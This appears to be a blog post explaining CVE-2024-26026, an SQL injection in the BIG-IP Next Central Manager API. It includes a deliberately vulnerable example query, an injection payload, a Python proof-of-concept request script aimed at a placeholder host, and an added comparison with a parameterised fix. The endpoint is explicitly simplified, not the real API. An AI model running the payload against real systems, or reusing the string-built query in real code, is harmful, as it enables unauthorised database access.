In February 2024, a critical vulnerability—CVE-2024-26026—was discovered in the BIG-IP Next Central Manager API. This bug made it possible for remote attackers to execute SQL injection attacks against the system, potentially granting unauthorized read and write access to sensitive data in the backend database.
In this exclusive post, we'll explain in plain language what the vulnerability is, how it works, and provide example code to demonstrate exploitation. If you're running affected versions of BIG-IP Next Central Manager, read on and patch now!
CVE-2024-26026 is an SQL injection vulnerability in the BIG-IP Next Central Manager API.
- Attackers can exploit this bug by crafting API requests containing malicious SQL code within the URI parameters.
- Successful exploitation allows unauthorized access, modification, and possible deletion of data stored in the application's database.
- F5's security advisory (K000138144) specifies that only supported versions are currently evaluated. End-of-Technical Support (EoTS) software might be vulnerable and is not receiving patches.
How Does the Attack Work?
SQL injection is possible because the vulnerable API endpoint does not properly sanitize user input, allowing attackers to manipulate SQL queries executed by the backend.
Imagine the application code looks like this (simplified for demonstration):
```python
import sqlite3

def get_device_by_id(device_id):
    conn = sqlite3.connect('bigip.db')
    cursor = conn.cursor()
    # Vulnerable: the caller-supplied id is spliced straight into the SQL text,
    # so any quote characters in it become part of the query
    query = "SELECT * FROM devices WHERE id = '%s'" % device_id
    cursor.execute(query)
    return cursor.fetchall()
```
If an attacker sends an API request like
```
GET /api/devices?id=1' OR '1'='1
```
the resulting query would be
```sql
SELECT * FROM devices WHERE id = '1' OR '1'='1'
```
This returns all devices! Even worse, a clever attacker can use SQL injection to dump sensitive data or alter the database.
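To make the difference concrete, here is an added example (not code from the original post or from F5) that runs the page's payload against the string-formatted pattern above and against a parameterised query, on a constructed in-memory SQLite table; the `devices` table layout and the sample rows are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the page's 'bigip.db' (assumption:
# a 'devices' table with text id and name columns).
SAMPLE_DEVICES = [("1", "edge-lb-01"), ("2", "edge-lb-02"), ("3", "core-lb-01")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE devices (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO devices VALUES (?, ?)", SAMPLE_DEVICES)
    return conn


def get_device_by_id_vulnerable(conn, device_id):
    # The page's pattern: the input is pasted into the SQL text, so the
    # quotes inside device_id close the literal and add an OR clause.
    query = "SELECT * FROM devices WHERE id = '%s'" % device_id
    return conn.execute(query).fetchall()


def get_device_by_id_safe(conn, device_id):
    # Hardened form: a bound parameter. The driver passes the value separately
    # from the SQL text, so quotes in it are compared as data, never parsed.
    query = "SELECT * FROM devices WHERE id = ?"
    return conn.execute(query, (device_id,)).fetchall()


def compare(device_id):
    """Return (vulnerable_rows, safe_rows) for the same input string."""
    conn = make_db()
    try:
        return (get_device_by_id_vulnerable(conn, device_id),
                get_device_by_id_safe(conn, device_id))
    finally:
        conn.close()


if __name__ == "__main__":
    injected = "1' OR '1'='1"  # the page's payload
    vuln, safe = compare(injected)
    print("vulnerable query returned", len(vuln), "rows")      # all 3 devices
    print("parameterised query returned", len(safe), "rows")  # 0: no id equals that literal
```

The same input that dumps every row through the formatted query matches nothing once it is bound as a parameter, which is the fix a code review of the vulnerable endpoint would ask for.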
Proof of Concept: Basic Exploit Example
Below is a simple Python proof of concept (PoC) using the popular requests library.
> Disclaimer: Run this against your own systems only, and only if you have permission.
```python
import requests

# Replace with the target URL/IP and port
target = "https://bigip-next-manager.example.com"
# Malicious payload: attempts to always return true
payload = "1' OR '1'='1"
# Craft the vulnerable API endpoint
api_endpoint = f"{target}/api/devices?id={payload}"
# Send the GET request (verify=False disables TLS certificate checking,
# which is only acceptable against a lab instance with a self-signed cert)
response = requests.get(api_endpoint, verify=False)
print(f"Status Code: {response.status_code}")
print("Response:")
print(response.text)
```
What happens?
If the system is vulnerable and unpatched, you'll get a list of all devices, not just the device with ID 1. More advanced attacks could further tamper with, delete, or extract database data.
Real-World Impact
- Information Disclosure: Attackers can extract device configurations, credentials, or other valuable secrets.
Is My Version Vulnerable?
- Reviewed and patched: Only actively supported versions are being checked and fixed by F5. (See official F5 security advisory)
- Older/EoTS: These are likely vulnerable and WILL NOT be fixed!
References
- NIST NVD: CVE-2024-26026
- F5 Security Advisory
- OWASP SQL Injection Cheat Sheet
Conclusion
CVE-2024-26026 is a severe SQL injection vulnerability in one of the most widely used network manager platforms. SQL injection is one of the oldest tricks in the hacker’s book, but its impact can be devastating in the right context. If you manage a BIG-IP Next Central Manager instance (especially an older one), now is the time to ACT: patch, monitor, and reduce attack surface today.
Timeline
Published on: 05/08/2024 15:15:08 UTC
Last modified on: 06/04/2024 17:49:06 UTC